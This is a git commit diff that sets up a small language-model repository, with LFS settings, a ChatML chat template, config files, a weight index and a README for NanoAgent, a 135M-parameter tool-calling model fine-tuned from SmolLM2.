初始化项目,由ModelHub XC社区提供模型
Model: applexml/kimi-k2 Source: Original Platform
This commit is contained in:
36
.gitattributes
vendored
Normal file
36
.gitattributes
vendored
Normal file
@@ -0,0 +1,36 @@
|
||||
*.7z filter=lfs diff=lfs merge=lfs -text
|
||||
*.arrow filter=lfs diff=lfs merge=lfs -text
|
||||
*.bin filter=lfs diff=lfs merge=lfs -text
|
||||
*.bz2 filter=lfs diff=lfs merge=lfs -text
|
||||
*.ckpt filter=lfs diff=lfs merge=lfs -text
|
||||
*.ftz filter=lfs diff=lfs merge=lfs -text
|
||||
*.gz filter=lfs diff=lfs merge=lfs -text
|
||||
*.h5 filter=lfs diff=lfs merge=lfs -text
|
||||
*.joblib filter=lfs diff=lfs merge=lfs -text
|
||||
*.lfs.* filter=lfs diff=lfs merge=lfs -text
|
||||
*.mlmodel filter=lfs diff=lfs merge=lfs -text
|
||||
*.model filter=lfs diff=lfs merge=lfs -text
|
||||
*.msgpack filter=lfs diff=lfs merge=lfs -text
|
||||
*.npy filter=lfs diff=lfs merge=lfs -text
|
||||
*.npz filter=lfs diff=lfs merge=lfs -text
|
||||
*.onnx filter=lfs diff=lfs merge=lfs -text
|
||||
*.ot filter=lfs diff=lfs merge=lfs -text
|
||||
*.parquet filter=lfs diff=lfs merge=lfs -text
|
||||
*.pb filter=lfs diff=lfs merge=lfs -text
|
||||
*.pickle filter=lfs diff=lfs merge=lfs -text
|
||||
*.pkl filter=lfs diff=lfs merge=lfs -text
|
||||
*.pt filter=lfs diff=lfs merge=lfs -text
|
||||
*.pth filter=lfs diff=lfs merge=lfs -text
|
||||
*.rar filter=lfs diff=lfs merge=lfs -text
|
||||
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
||||
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
||||
*.tar.* filter=lfs diff=lfs merge=lfs -text
|
||||
*.tar filter=lfs diff=lfs merge=lfs -text
|
||||
*.tflite filter=lfs diff=lfs merge=lfs -text
|
||||
*.tgz filter=lfs diff=lfs merge=lfs -text
|
||||
*.wasm filter=lfs diff=lfs merge=lfs -text
|
||||
*.xz filter=lfs diff=lfs merge=lfs -text
|
||||
*.zip filter=lfs diff=lfs merge=lfs -text
|
||||
*.zst filter=lfs diff=lfs merge=lfs -text
|
||||
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
||||
model.gguf filter=lfs diff=lfs merge=lfs -text
|
||||
25
Modelfile
Normal file
25
Modelfile
Normal file
@@ -0,0 +1,25 @@
|
||||
TEMPLATE """{{- if .Messages }}
|
||||
{{- if .System }}<|im_start|>system
|
||||
{{ .System }}<|im_end|>
|
||||
{{ end }}
|
||||
{{- range $i, $_ := .Messages }}
|
||||
{{- $last := eq (len (slice $.Messages $i)) 1 -}}
|
||||
{{- if eq .Role "user" }}<|im_start|>user
|
||||
{{ .Content }}<|im_end|>
|
||||
{{ else if eq .Role "assistant" }}<|im_start|>assistant
|
||||
{{ .Content }}{{ if not $last }}<|im_end|>
|
||||
{{ end }}
|
||||
{{- end }}
|
||||
{{- if and (ne .Role "assistant") $last }}<|im_start|>assistant
|
||||
{{ end }}
|
||||
{{- end }}
|
||||
{{- else }}
|
||||
{{- if .System }}<|im_start|>system
|
||||
{{ .System }}<|im_end|>
|
||||
{{ end }}{{ if .Prompt }}<|im_start|>user
|
||||
{{ .Prompt }}<|im_end|>
|
||||
{{ end }}<|im_start|>assistant
|
||||
{{ end }}{{ .Response }}{{ if .Response }}<|im_end|>{{ end }}"""
|
||||
SYSTEM You are a helpful AI assistant.
|
||||
PARAMETER stop <|im_start|>
|
||||
PARAMETER stop <|im_end|>
|
||||
151
README.md
Normal file
151
README.md
Normal file
@@ -0,0 +1,151 @@
|
||||
---
|
||||
language:
|
||||
- en
|
||||
license: apache-2.0
|
||||
tags:
|
||||
- llm
|
||||
- tool-calling
|
||||
- lightweight
|
||||
- agentic-tasks
|
||||
- react
|
||||
- mlx
|
||||
model-index:
|
||||
- name: NanoAgent
|
||||
results: []
|
||||
datasets:
|
||||
- microsoft/orca-agentinstruct-1M-v1
|
||||
- microsoft/orca-math-word-problems-200k
|
||||
- allenai/tulu-3-sft-personas-instruction-following
|
||||
- xingyaoww/code-act
|
||||
- m-a-p/Code-Feedback
|
||||
- weijie210/gsm8k_decomposed
|
||||
- Locutusque/function-calling-chatml
|
||||
- HuggingFaceTB/smoltalk
|
||||
base_model:
|
||||
- HuggingFaceTB/SmolLM2-135M-Instruct
|
||||
pipeline_tag: text-generation
|
||||
---
|
||||
# POC
|
||||
|
||||
# FORKED FROM
|
||||
# 🧠 NanoAgent — 135M Parameter Agentic LLM
|
||||
|
||||
NanoAgent is a compact 135M parameter, 8k context-length language model trained to **perform tool calls** and **generate responses based on tool outputs**.
|
||||
Despite its small size (~135 MB in 8-bit precision), it’s optimized for agentic use cases and runs easily on personal devices.
|
||||
|
||||
**Github:** [NanoAgent](https://github.com/QuwsarOhi/NanoAgent)
|
||||
|
||||
**Inference resource:** [link](https://github.com/QuwsarOhi/NanoAgent/blob/main/notebooks/inference.ipynb)
|
||||
|
||||
---
|
||||
|
||||
## ✨ Features
|
||||
|
||||
- 🧰 **Tool Calling** — understands and responds with structured outputs from tool calls.
|
||||
- 🧭 **Instruction Following** — strong instruction following abilities.
|
||||
- 🧠 **Basic Reasoning** — handles lightweight reasoning and ReAct-style interactions.
|
||||
- ⚡ **Lightweight** — runs on local hardware with minimal resources.
|
||||
|
||||
---
|
||||
|
||||
## 🧪 Training Overview
|
||||
|
||||
**Base model:** [`SmolLM2-135M-Instruct`](https://huggingface.co/HuggingFaceTB/SmolLM2-135M-Instruct)
|
||||
**Fine-tuning method:** [Dynamic Fine-Tuning (DFT)](https://github.com/yongliang-wu/DFT/tree/master)
|
||||
**Hardware:** Apple Mac M1 (16 GB Unified Memory) using MLX.
|
||||
|
||||
### 📚 Datasets Used
|
||||
- `microsoft/orca-agentinstruct-1M-v1` — agentic tasks, RAG answers, classification
|
||||
- `microsoft/orca-math-word-problems-200k` — lightweight reasoning
|
||||
- `allenai/tulu-3-sft-personas-instruction-following` — instruction following
|
||||
- `xingyaoww/code-act` — ReAct style reasoning and action
|
||||
- `m-a-p/Code-Feedback` — alignment via feedback
|
||||
- `HuggingFaceTB/smoltalk` + `/apigen` — tool calling stabilization
|
||||
- `weijie210/gsm8k_decomposed` — question decomposition
|
||||
- `Locutusque/function-calling-chatml` — tool call response structure
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Disclaimer
|
||||
|
||||
This is a **beta model**.
|
||||
- It may produce **incorrect** or **incomplete** outputs.
|
||||
- Tool call execution is **basic** and can fail in some cases.
|
||||
- Intended for **research and experimentation** only — not production use.
|
||||
|
||||
---
|
||||
|
||||
## 🧭 Roadmap
|
||||
|
||||
- ✅ Initial release with DFT fine-tuning
|
||||
- 🧪 Benchmarking on agentic tasks
|
||||
- ~~🔬 Experimenting with GRPO for tool calling (failed)~~
|
||||
- 🧠 Weight merging experiments for improved performance
|
||||
- Add more tool calling dataset
|
||||
|
||||
---
|
||||
|
||||
## 📥 Model Size
|
||||
|
||||
- 135M parameters
|
||||
- ~135 MB in 8-bit precision
|
||||
- 8k context length
|
||||
|
||||
---
|
||||
|
||||
## ⚡ Example Usage
|
||||
|
||||
```python
|
||||
from transformers import AutoModelForCausalLM, AutoTokenizer
|
||||
|
||||
model_name = "quwsarohi/NanoAgent-135M"
|
||||
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
||||
model = AutoModelForCausalLM.from_pretrained(model_name)
|
||||
|
||||
def inference(messages, max_new_tokens=256, temperature=0.3, min_p=0.15, **kwargs):
|
||||
input_text = tokenizer.apply_chat_template(
|
||||
messages, tokenize=False, add_generation_prompt=True
|
||||
)
|
||||
inputs = tokenizer.encode(input_text, return_tensors="pt")
|
||||
outputs = model.generate(
|
||||
inputs,
|
||||
max_new_tokens=max_new_tokens,
|
||||
do_sample=True,
|
||||
min_p=0.15,
|
||||
temperature=temperature,
|
||||
**kwargs
|
||||
)
|
||||
return tokenizer.decode(outputs[0][inputs.shape[1] :], skip_special_tokens=True)
|
||||
|
||||
messages = [{"role": "user", "content": "Hi! Do you have a name?"}]
|
||||
print(inference(messages))
|
||||
```
|
||||
|
||||
Use the following template for tool calling:
|
||||
```python
|
||||
TOOL_TEMPLATE = """You are a helpful AI assistant. You have a set of possible functions/tools inside <tools></tools> tags.
|
||||
Based on question, you may need to make one or more function/tool calls to answer user.
|
||||
|
||||
You have access to the following tools/functions:
|
||||
<tools>{tools}</tools>
|
||||
|
||||
For each function call, return a JSON list object with function name and arguments within <tool_call></tool_call> tags."""
|
||||
```
|
||||
|
||||
Sample tool call definition:
|
||||
```json
|
||||
{
|
||||
"name": "web_search",
|
||||
"description": "Performs a web search for a query and returns a string of the top search results formatted as markdown with titles, links, and descriptions.",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"query": {
|
||||
"type": "string",
|
||||
"description": "The search query to perform.",
|
||||
}
|
||||
},
|
||||
"required": ["query"],
|
||||
},
|
||||
}
|
||||
```
|
||||
11
chat_template.jinja
Normal file
11
chat_template.jinja
Normal file
@@ -0,0 +1,11 @@
|
||||
{% for message in messages %}
|
||||
{% if loop.first and messages[0]['role'] != 'system' %}
|
||||
{{ '<|im_start|>system
|
||||
You are a helpful AI assistant. <|im_end|>' }}
|
||||
{% endif %}
|
||||
{{'<|im_start|>' + message['role'] + '
|
||||
' + message['content'] + '<|im_end|>'}}
|
||||
{% endfor %}
|
||||
{% if add_generation_prompt %}
|
||||
{{ '<|im_start|>assistant' }}
|
||||
{% endif %}
|
||||
38
config.json
Normal file
38
config.json
Normal file
@@ -0,0 +1,38 @@
|
||||
{
|
||||
"architectures": [
|
||||
"LlamaForCausalLM"
|
||||
],
|
||||
"attention_bias": false,
|
||||
"attention_dropout": 0.0,
|
||||
"bos_token_id": 1,
|
||||
"eos_token_id": 2,
|
||||
"head_dim": 64,
|
||||
"hidden_act": "silu",
|
||||
"hidden_size": 576,
|
||||
"initializer_range": 0.041666666666666664,
|
||||
"intermediate_size": 1536,
|
||||
"is_llama_config": true,
|
||||
"max_position_embeddings": 8192,
|
||||
"mlp_bias": false,
|
||||
"model_type": "llama",
|
||||
"num_attention_heads": 9,
|
||||
"num_hidden_layers": 30,
|
||||
"num_key_value_heads": 3,
|
||||
"pad_token_id": 2,
|
||||
"pretraining_tp": 1,
|
||||
"rms_norm_eps": 1e-05,
|
||||
"rope_interleaved": false,
|
||||
"rope_scaling": null,
|
||||
"rope_theta": 100000,
|
||||
"tie_word_embeddings": true,
|
||||
"torch_dtype": "bfloat16",
|
||||
"transformers.js_config": {
|
||||
"kv_cache_dtype": {
|
||||
"fp16": "float16",
|
||||
"q4f16": "float16"
|
||||
}
|
||||
},
|
||||
"transformers_version": "4.55.4",
|
||||
"use_cache": true,
|
||||
"vocab_size": 49152
|
||||
}
|
||||
7
generation_config.json
Normal file
7
generation_config.json
Normal file
@@ -0,0 +1,7 @@
|
||||
{
|
||||
"_from_model_config": true,
|
||||
"bos_token_id": 1,
|
||||
"eos_token_id": 1,
|
||||
"pad_token_id": 2,
|
||||
"transformers_version": "4.42.3"
|
||||
}
|
||||
48901
merges.txt
Normal file
48901
merges.txt
Normal file
File diff suppressed because it is too large
Load Diff
3
model.safetensors
Normal file
3
model.safetensors
Normal file
@@ -0,0 +1,3 @@
|
||||
version https://git-lfs.github.com/spec/v1
|
||||
oid sha256:b788815ccc4faf78f3a7cdd527b4b2306884ddf73a3b770d63e3e791ebf23ca0
|
||||
size 269060552
|
||||
280
model.safetensors.index.json
Normal file
280
model.safetensors.index.json
Normal file
@@ -0,0 +1,280 @@
|
||||
{
|
||||
"metadata": {
|
||||
"total_size": 269030016,
|
||||
"total_parameters": 134515008
|
||||
},
|
||||
"weight_map": {
|
||||
"model.embed_tokens.weight": "model.safetensors",
|
||||
"model.layers.0.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.0.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.0.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.0.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.0.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.0.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.0.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.0.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.0.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.1.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.1.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.1.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.1.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.1.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.1.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.1.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.1.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.1.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.10.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.10.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.10.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.10.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.10.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.10.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.10.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.10.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.10.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.11.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.11.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.11.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.11.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.11.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.11.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.11.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.11.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.11.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.12.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.12.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.12.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.12.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.12.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.12.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.12.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.12.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.12.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.13.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.13.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.13.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.13.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.13.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.13.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.13.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.13.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.13.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.14.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.14.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.14.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.14.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.14.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.14.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.14.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.14.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.14.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.15.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.15.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.15.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.15.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.15.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.15.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.15.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.15.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.15.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.16.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.16.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.16.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.16.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.16.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.16.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.16.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.16.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.16.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.17.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.17.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.17.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.17.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.17.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.17.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.17.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.17.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.17.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.18.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.18.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.18.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.18.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.18.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.18.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.18.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.18.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.18.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.19.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.19.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.19.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.19.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.19.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.19.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.19.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.19.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.19.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.2.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.2.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.2.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.2.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.2.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.2.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.2.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.2.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.2.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.20.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.20.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.20.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.20.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.20.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.20.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.20.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.20.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.20.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.21.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.21.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.21.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.21.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.21.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.21.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.21.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.21.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.21.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.22.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.22.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.22.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.22.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.22.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.22.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.22.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.22.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.22.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.23.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.23.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.23.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.23.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.23.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.23.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.23.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.23.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.23.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.24.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.24.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.24.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.24.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.24.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.24.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.24.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.24.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.24.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.25.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.25.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.25.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.25.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.25.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.25.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.25.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.25.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.25.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.26.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.26.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.26.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.26.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.26.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.26.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.26.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.26.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.26.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.27.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.27.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.27.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.27.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.27.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.27.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.27.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.27.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.27.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.28.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.28.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.28.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.28.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.28.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.28.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.28.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.28.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.28.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.29.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.29.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.29.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.29.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.29.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.29.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.29.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.29.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.29.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.3.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.3.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.3.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.3.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.3.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.3.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.3.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.3.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.3.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.4.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.4.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.4.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.4.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.4.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.4.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.4.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.4.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.4.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.5.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.5.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.5.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.5.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.5.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.5.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.5.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.5.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.5.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.6.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.6.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.6.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.6.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.6.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.6.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.6.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.6.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.6.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.7.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.7.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.7.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.7.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.7.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.7.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.7.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.7.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.7.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.layers.8.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.8.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.8.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.8.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.8.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.8.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.8.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.8.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.8.self_attn.v_proj.weight": "model.safetensors",
|
||||
